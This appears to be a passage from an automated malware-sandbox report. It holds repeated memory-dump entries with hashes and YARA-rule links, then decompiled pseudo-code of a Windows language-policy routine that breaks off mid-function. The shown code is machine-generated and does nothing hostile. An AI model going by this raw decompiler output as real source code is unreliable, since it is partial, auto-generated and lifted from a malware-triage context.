                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                                                                          • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFA50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                                                                          • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFBE8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                                                                          • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFB50, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFC30, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                                                          • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFC48, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                                                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D0C40, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                                          • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D1D80, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFD5C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFE24, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFFFC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFF34, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008F8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E008F8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008F718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008F718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E008F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008F718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008D2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008EE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008DE2A8(_t322,  &_v68, _v16);
								if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008EE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008DE2A8(_t322,  &_v68, _t236);
								if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008F718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008D2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008EE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008DE2A8(_v12,  &_v68, _v16);
							if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008EE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008DE2A8(_t322,  &_v68, _t269);
							if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008F718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008D2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008EE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008DE2A8(_v12,  &_v68, _v16);
						if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008EE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008DE2A8(_t322,  &_v68, _t296);
						if(E008F5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
